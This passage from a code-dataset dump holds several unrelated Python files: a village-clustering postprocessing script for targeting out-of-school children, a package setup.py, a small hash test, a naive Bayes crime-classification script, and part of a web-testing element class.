4 or fewer villages and assign these villages to closest cluster\n(a rough sketch of this step follows the stage-1 stats below)\n'''\nprint(\"--------------- Postprocessing Stage 1: Dissolving clusters with 4 or fewer villages and reassigning them to closest cluster ----------\")\npostprocessing_small(cluster_results_ = cluster_results_original, cluster_stats_ = cluster_stats_original, cluster_centers_ = cluster_centers_original)\n\n#Generate stats for these postprocessed results\nfile = \"Excel_results/Postprocessed1/Postprocessed1_dropsmall.xlsx\"\ncluster_results_1 = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\nclusters_dropped_df = pd.read_excel(file, sheet_name = \"Clusters_dropped\")\ncluster_vals_dropped = list(clusters_dropped_df[\"Clusters_dropped\"].values)\ncluster_centers_1 = compute_centers(cluster_results_1)\n\ncluster_stats_1, dist_stats_1, OOSC_stats_1 = recompute_final_stats(centers_ = cluster_centers_1, cluster_results_ = cluster_results_1, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_1, dist_stats_ = dist_stats_1)\nstats_figures(dist_stats_ = dist_stats_1, cluster_stats_ = cluster_stats_1, postprocessing_stage = 1)\n\n#Generate map for this iteration of postprocessing - Use jupyter notebook file\n\n
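# For intuition, a rough sketch of what the dissolve-and-reassign step inside postprocessing_small\n# could look like (kept as a comment; the column names below are hypothetical, the real logic\n# lives in Systematic_postprocessing_formulation):\n# small_ids = cluster_stats_1.loc[cluster_stats_1[\"num_villages\"] <= 4, \"cluster_id\"]\n# for row in cluster_results_1[cluster_results_1[\"cluster_id\"].isin(small_ids)].itertuples():\n# dists = ((cluster_centers_1[\"X\"] - row.X)**2 + (cluster_centers_1[\"Y\"] - row.Y)**2)**0.5\n# cluster_results_1.loc[row.Index, \"cluster_id\"] = dists.drop(small_ids, errors=\"ignore\").idxmin()\n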
#------------- Postprocessing Stage 2 --------------------#\n'''\nUncluster villages that are 5 or more km from their cluster centers and reassign them to closest cluster\nHelps with overlapping villages\n'''\n\nprint(\"--------------- Postprocessing Stage 2: Unclustering villages that are 5 or more km from their cluster centers and reassigning them to closest cluster ----------\")\npostprocessing_far(cluster_results_ = cluster_results_1, centers_df = cluster_centers_1)\n\n# #Generate stats for these postprocessed results\nfile = \"Excel_results/Postprocessed2/Postprocessed2_far.xlsx\"\ncluster_results_2 = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\ncluster_centers_2 = compute_centers(cluster_results_2)\n\ncluster_stats_2, dist_stats_2, OOSC_stats_2 = recompute_final_stats(centers_ = cluster_centers_2, cluster_results_ = cluster_results_2, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_2, dist_stats_ = dist_stats_2)\nstats_figures(dist_stats_ = dist_stats_2, cluster_stats_ = cluster_stats_2, postprocessing_stage = 2)\n\n# #Generate map for this iteration of postprocessing - Use jupyter notebook file\n\n#------------- Postprocessing Stage 3 --------------------#\n'''\nBring the number of clustered villages up to 1800 with two steps:\nA. Add in unclustered villages with 15 or more OOSC (15 marks the start of the right tail of the OOSC dist)\nB. Add in remaining necessary villages by increasing distance to existing cluster centers'''\n\nprint(\"--------------- Postprocessing Stage 3a: Adding in villages with 15 or more OOSC ----------\")\n\npostprocessing_addbyOOSC(cluster_results_ = cluster_results_2, centers_df_ = cluster_centers_2)\nfile = \"Excel_results/Postprocessed3/Postprocessed3a_addOOSC.xlsx\"\ncluster_results_3a = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\ncluster_centers_3a = compute_centers(cluster_results_3a)\n\nprint(\"------ Postprocessing Stage 3b: Adding in enough remaining villages to reach 1800 goal in order of distance to existing clusters----------\")\n\npostprocessing_addbydist(cluster_results_ = cluster_results_3a, centers_df_ = cluster_centers_3a)\nfile = \"Excel_results/Postprocessed3/Postprocessed3b_addbydist.xlsx\"\ncluster_results_3b = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\ncluster_centers_3b = compute_centers(cluster_results_3b)\n\n#Generate stats for these postprocessed results\ncluster_stats_3, dist_stats_3, OOSC_stats_3 = recompute_final_stats(centers_ = cluster_centers_3b, cluster_results_ = cluster_results_3b, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_3, dist_stats_ = dist_stats_3)\nstats_figures(dist_stats_ = dist_stats_3, cluster_stats_ = cluster_stats_3, postprocessing_stage = 3)\n\n#Generate map for this iteration of postprocessing - Use jupyter notebook file\n\n#------------- Postprocessing Stage 4 --------------------#\n'''\nManually fix a few clusters'''\n\nprint(\"--------------- Postprocessing Stage 4: Manually fixing a few clusters ----------\")\ncluster_results_new = cluster_results_3b.copy()\n\n#Fix overlapping clusters\n#Dissolve cluster 172 and reassign to either 211 or 212\ncluster_results_new.loc[(cluster_results_new.Block == \"BADARWAS\") & (cluster_results_new.Village == \"LAGDA\"), \"cluster_id\"] = 211\ncluster_results_new.loc[cluster_results_new.cluster_id == 172, \"cluster_id\"] = 212\n\n# Move village in 234\ncluster_results_new.loc[(cluster_results_new.Block == \"PICHHORE\") & 
(cluster_results_new.Village == \"KAMALPUR\"), \"cluster_id\"] = 195\n\n# Move village in 277\ncluster_results_new.loc[(cluster_results_new.Block == \"SHIVPURI\") & (cluster_results_new.Village == \"SOOND\"), \"cluster_id\"] = 241\n\n#Appending cluster 172 to list of clusters that have been dropped in postprocessing\ncluster_vals_dropped.append(172)\nclusters_dropped_df = pd.DataFrame({\"Clusters_dropped\":cluster_vals_dropped})\n\nwriter = pd.ExcelWriter(\"Excel_results/Postprocessed4/Postprocessed_manual.xlsx\")\ncluster_results_new.to_excel(excel_writer = writer, sheet_name = 'Cluster_assignments')\nclusters_dropped_df.to_excel(excel_writer = writer, sheet_name = 'Clusters_dropped')\nwriter.save()\n\n#Generating statistics for this postprocessing stage\nfile = \"Excel_results/Postprocessed4/Postprocessed_manual.xlsx\"\ncluster_results_4 = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\nclusters_dropped_df = pd.read_excel(file, sheet_name = 'Clusters_dropped')\ncluster_vals_dropped = list(clusters_dropped_df[\"Clusters_dropped\"].values)\n\ncluster_centers_4 = compute_centers(cluster_results_4)\n\n#Generate stats for these postprocessed results\ncluster_stats_4, dist_stats_4, OOSC_stats_4 = recompute_final_stats(centers_ = cluster_centers_4, cluster_results_ = cluster_results_4, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_4, dist_stats_ = dist_stats_4)\nstats_figures(dist_stats_ = dist_stats_4, cluster_stats_ = cluster_stats_4, postprocessing_stage = 4)\n\n#------------- Postprocessing Stage 5 --------------------#\n'''\nRe-fix small clusters that were created during postprocessing\nDissolves clusters with 4 or fewer villages and fewer than 100 OOSC and reassigns these villages\nto closest cluster\n'''\n\nprint(\"--------- Postprocessing Stage 5: Dissolving and reassigning clusters with 4 or fewer villages and fewer than 100 OOSC ----------\")\npostprocessing_small_if_few(cluster_stats_ = cluster_stats_4, cluster_results_ = cluster_results_4, centers_df_ = cluster_centers_4, cluster_vals_dropped_ = cluster_vals_dropped)\n\n#Generate stats for these postprocessed results\nfile = \"Excel_results/Postprocessed5/Postprocessed5_smallfew.xlsx\"\ncluster_results_5 = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\nclusters_dropped_df = pd.read_excel(file, sheet_name = 'Clusters_dropped')\ncluster_vals_dropped = list(clusters_dropped_df[\"Clusters_dropped\"].values)\ncluster_centers_5 = compute_centers(cluster_results_5)\n\ncluster_stats_5, dist_stats_5, OOSC_stats_5 = recompute_final_stats(centers_ = cluster_centers_5, cluster_results_ = cluster_results_5, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_5, dist_stats_ = dist_stats_5)\nstats_figures(dist_stats_ = dist_stats_5, cluster_stats_ = cluster_stats_5, postprocessing_stage = 5)\n\n#------------- Renumber cluster IDs in final results --------------------#\n'''\nRenumber cluster IDs so that they are continuous accounting for dropped clusters\n'''\nprint(\"--------- Postprocessing done, Renumbering clusters so that cluster IDs are continuous ----------\")\n\nrenumber_clusters(cluster_results_ = cluster_results_5)\n#Generate stats for these postprocessed results\nfile = \"Excel_results/Renumbered/Final_clusters.xlsx\"\ncluster_results_final = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\ncluster_centers_final = compute_centers(cluster_results_final)\n\ncluster_stats_final, 
dist_stats_final, OOSC_stats_final = recompute_final_stats(centers_ = cluster_centers_final, cluster_results_ = cluster_results_final)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_final, dist_stats_ = dist_stats_final)\nstats_figures(dist_stats_ = dist_stats_final, cluster_stats_ = cluster_stats_final, postprocessing_stage = \"final\")\n\n","repo_name":"mghersher/targeting_algorithm","sub_path":"Systematic_postprocessing_run.py","file_name":"Systematic_postprocessing_run.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"29616213059","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"mhcshrubs\",\n version=\"0.2.0\",\n author=\"Christiaan H. van Dorp\",\n author_email=\"chvandorp@gmail.com\",\n description=\"Find associations between MHC genotype and disease traits using MHC similarities\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/chvandorp/MHCshrubs\",\n packages=setuptools.find_packages(),\n include_package_data=True,\n package_data={\n '' : ['stan/*.stan', 'jags/*.bug', 'resources/*']\n },\n entry_points={\n 'console_scripts': [\n 'mhcshrubs = mhcshrubs.main:main'\n ]\n },\n install_requires=[\n 'numpy',\n 'scipy',\n 'PyQt5',\n 'ete3',\n 'networkx',\n 'tqdm',\n 'pystan',\n 'matplotlib'\n ],\n classifiers=(\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n ),\n)\n","repo_name":"chvandorp/MHCshrubs","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} {"seq_id":"16210697423","text":"from ECMH import MultiHash\n\nset1 = (b'lixp',)\nset3 = (b'lixp', b'0017')\nset4 = (b'0017', b'lixp')\nset2 = (b'lixp',b'lixp')\nresult1 = MultiHash(set1)\nresult2 = MultiHash(set2)\nresult3 = MultiHash(set3)\nresult4 = MultiHash(set4)\nprint(\"hash(set1) = \", result1)\nprint(\"hash(set2) = \", result2)\nprint(\"hash(set3) = \", result3)\nprint(\"hash(set4) = \", result4)","repo_name":"grey-potato/exp","sub_path":"SM2 ECMH.py","file_name":"SM2 ECMH.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"39012703102","text":"#coding=utf-8\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.metrics import log_loss\nfrom sklearn.naive_bayes import BernoulliNB\nimport time\n\ndef get_X(crime,train_one):\n lists = {}\n means = {}\n m_vars = {}\n length = len(crime)\n i = 0\n while(i < length):\n t_da = crime[i]\n if t_da not in lists:\n lists[t_da] = []\n means[t_da] = 0\n
m_vars[t_da] = 0\n i = i + 1\n i = 0\n while(i < length):\n lists[train_one['category'][i]].append(train_one['X'][i])\n i = i + 1\n for key in lists.keys():\n #print key\n t_l = lists[key]\n t_a = np.array(t_l)\n means[key] = t_a.mean()\n m_vars[key] = np.cov(t_a)\n #print means\n #print m_vars\n return means,m_vars\n\ndef get_Y(crime,train_one):\n lists = {}\n means = {}\n m_vars = {}\n length = len(crime)\n i = 0\n while(i < length):\n t_da = crime[i]\n if t_da not in lists:\n lists[t_da] = []\n means[t_da] = 0\n m_vars[t_da] = 0\n i = i + 1\n i = 0\n while(i < length):\n lists[train_one['category'][i]].append(train_one['Y'][i])\n i = i + 1\n for key in lists.keys():\n t_l = lists[key]\n t_a = np.array(t_l)\n means[key] = t_a.mean()\n m_vars[key] = np.cov(t_a)\n #print means\n #print m_vars\n return means,m_vars\n\ndef get_pro(x,mean,var):\n return (1.0/np.sqrt(2*np.pi*var))*np.exp(-1*np.square(x-mean)/(2*var))\n\n\ndef get_final(X_data,Y_results,means_X,means_Y,m_vars_X,m_vars_Y):\n F_Y = []\n X_lengths = Y_results.shape[0]\n i = 0\n while(i < X_lengths):\n t_y = Y_results[i]\n Y_lengths = len(t_y)\n j = 0\n t_X = X_data['X'][i]\n t_Y = X_data['Y'][i]\n while(j < Y_lengths):\n Y_results[i][j] = t_y[j] * get_pro(t_X,means_X[j],m_vars_X[j])*get_pro(t_Y,means_Y[j],m_vars_Y[j])\n j= j + 1\n i = i + 1\n return Y_results\n\n\n#Load the csv training data with pandas, parsing the Dates column as dates\ntrain=pd.read_csv(r'train.csv', parse_dates = ['Dates'])\ntest=pd.read_csv(r'test.csv', parse_dates = ['Dates'])\ntrain_data = train.copy()\n#print(train.info(),train.describe())\n#Use LabelEncoder to give each crime category a numeric label\nleCrime = preprocessing.LabelEncoder()\ncrime = leCrime.fit_transform(train.Category)\ndel train_data['Category']\ntrain_data.insert(2,'category',crime)\ng_meansX,g_varsX = get_X(crime,train_data)\ng_meansY,g_varsY = get_Y(crime,train_data)\n#print crime\n#One-hot encode the day of week, district and hour features\ndays = pd.get_dummies(train.DayOfWeek)\ndistrict = pd.get_dummies(train.PdDistrict)\nhour = train.Dates.dt.hour\nhour = pd.get_dummies(hour)\n#Combine the features\ntrainData = pd.concat([hour, days, district,train['X'],train['Y']], axis=1)\ntrainData['crime']=crime\n#print trainData\n#print trainData.dtypes\n#Apply the same processing to the test data\ndays = pd.get_dummies(test.DayOfWeek)\ndistrict = pd.get_dummies(test.PdDistrict)\nhour = test.Dates.dt.hour\nhour = pd.get_dummies(hour)\ntestData = pd.concat([hour, days, district], axis=1)\nfeatures = ['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday',\n'Wednesday', 'BAYVIEW', 'CENTRAL', 'INGLESIDE', 'MISSION',\n'NORTHERN', 'PARK', 'RICHMOND', 'SOUTHERN', 'TARAVAL', 'TENDERLOIN']\nhourFea = [x for x in range(0,24)]\nfeatures = features + hourFea\n# Split the data into a training set (2/5) and a validation set (3/5)\ntraining, validation = train_test_split(trainData, test_size=0.6)\ndel training['X']\ndel training['Y']\nX_datas = validation['X']\nY_datas = validation['Y']\nlength = X_datas.shape[0]\nindexes = []\ni = 0\nwhile(i < length):\n indexes.append(i)\n i = i + 1\nXX = X_datas.reindex(indexes)\nYY = Y_datas.reindex(indexes)\ndatas = pd.DataFrame()\ndatas.insert(0,'X',XX)\ndatas.insert(0,'Y',YY)\ni = 0\ndel validation['X']\ndel validation['Y']\n\n\n'''\nX_train, X_test, y_train, y_test =\ncross_validation.train_test_split(train_data, train_target, test_size=0.4, random_state=0)\ntrain_data: the sample features to be split\ntrain_target: the sample labels to be split\ntest_size: the proportion of samples to hold out; if it is an integer, it is the number of samples\nrandom_state: the seed for the random number generator.\nRandom seed: essentially a label for a group of random numbers. When an experiment needs to be repeatable, it guarantees the same random numbers are produced; for example, always passing 1 with the same other parameters yields the same random array, while passing 0 or nothing gives a different one each time.\nRandom numbers are produced from the seed, and the relation between seed and numbers follows two rules:\ndifferent seeds produce different random numbers; the same seed produces the same random numbers, even in different instances.\n'''\n# Fit a naive Bayes model and compute the log_loss\nmodel = BernoulliNB()\n'''BernoulliNB assumes the prior probability of each feature follows a binary Bernoulli distribution, i.e.:\nP(Xj=xjl|Y=Ck) = P(j|Y=Ck)*xjl + (1 - P(j|Y=Ck))*(1 - xjl)\nwhere l takes only two values, so xjl can only be 0 or 1.\nBernoulliNB has 4 parameters in total; 3 of them have the same name and meaning as in MultinomialNB.\nThe only additional parameter is binarize. It is mainly there to help BernoulliNB handle binary data,\nand can be a number or left unset. If unset, BernoulliNB assumes every feature is already binary.\nOtherwise, values below binarize are mapped to one class and values above it to the other.\nAfter fitting the data with BernoulliNB's fit or partial_fit method, we can make predictions.\nThere are three prediction methods: predict, predict_log_proba and predict_proba.\npredict is the most commonly used method; it directly outputs the predicted class for the test set.\npredict_proba is different: it gives the predicted probability of each class for the test samples.\nIt is easy to see that the class with the largest predict_proba probability is exactly the class returned by predict.\npredict_log_proba is similar to predict_proba, but returns a log transform of the predicted class probabilities.\nAfter the transform, the class with the largest log probability from predict_log_proba is again the class returned by predict.'''\n
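# A quick illustration of the above (hypothetical numbers): for a single validation row,\n# model.predict_proba(row) returns one probability per class, e.g. [[0.01, 0.70, 0.29, ...]],\n# and model.predict(row) returns the class behind the largest of those probabilities.\n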
nbStart = time.time()\nmodel.fit(training[features], training['crime'])\n'''Note on partial_fit: it incrementally trains on one batch of samples at a time.\nIt can be called several times in a row on different datasets to implement out-of-core and online learning, which is especially useful when the dataset is too large to fit in memory.\nThe method carries some performance and numerical-stability overhead, so it is best applied to the largest data chunks possible (as long as they fit within the memory budget).'''\nnbCostTime = time.time() - nbStart # elapsed time\nt_result = model.predict_proba(validation[features])\nF_predicted = get_final(datas,t_result,g_meansX,g_varsX,g_meansY,g_varsY)\n\npredicted = np.array(model.predict_proba(validation[features]))\n#print predicted\nprint(\"Naive Bayes modeling took %f seconds\" %(nbCostTime))\nprint(\"Naive Bayes log loss is %f\" %(log_loss(validation['crime'], F_predicted)))","repo_name":"WXW322/biology_search","sub_path":"project_kaggle/personal/model_one.py","file_name":"model_one.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"21532528954","text":"from . import wait, app\n\n\nclass Element(app.BaseItem):\n \"\"\"Base HTML Element\n\n Except where noted: methods using self.reference should have _update_reference run before them\n \"\"\"\n\n item_type = 'Element'\n\n def _wait_for_page_to_load(self, timeout=None, expected_url_change=True, check_ready_state=False,\n check_staleness=True, tabs=0):\n \"\"\"Perform wait until page is detected as stale or url is changed\n\n :param float timeout: timeout to expire, in seconds\n :param bool expected_url_change: if True, expects a url change to happen\n :param bool check_ready_state: if True, check for DOM ready state\n :param bool check_staleness: if True, check for page staleness\n :param int tabs: the number of tabs to prepend messages\n \"\"\"\n\n tabs_plus_one = tabs + 1\n self.utils.start_timer('page_load', self.timers, tabs=tabs_plus_one)\n\n if timeout is None:\n timeout = wait.PAGE_TIMEOUT\n\n if not self._is_reference_page_stale():\n self._wait_until_page_loaded(self, timeout, check_staleness=check_staleness,\n check_ready_state=check_ready_state)\n\n if expected_url_change:\n url_message = \"Changes expected but url did not change: {}\".format(self._page_url) \\\n if self._page_url == self.source.browser.current_url \\\n else \"Change in url detected: {}\".format(self.source.browser.current_url)\n self.utils.console(url_message, tabs=tabs_plus_one)\n elif self._is_reference_page_stale():\n self.utils.console(\"Page change detected.\", tabs=tabs_plus_one)\n\n self._page_url = self.source.browser.current_url\n self.utils.time_elapsed('page_load', self.timers, tabs=tabs_plus_one)\n\n\nclass Image(Element):\n \"\"\"Representing Image \"\"\"\n\n @property\n def file_path(self):\n \"\"\"Get image source path\n\n Note: this is the same as source_url property\n \"\"\"\n\n return self.source_url\n\n\nclass Caption(Element):\n \"\"\"Representing Caption/ Text element\"\"\"\n\n def click(self, message='', update=True):\n \"\"\"Perform a click operation\n\n :param str message: the message to display\n :param bool update: if True, runs update reference first\n \"\"\"\n\n if update:\n self._update_reference(force=self.angular)\n\n self._perform_click(message, use_script=True)\n\n\nclass Label(Caption):\n \"\"\"Representing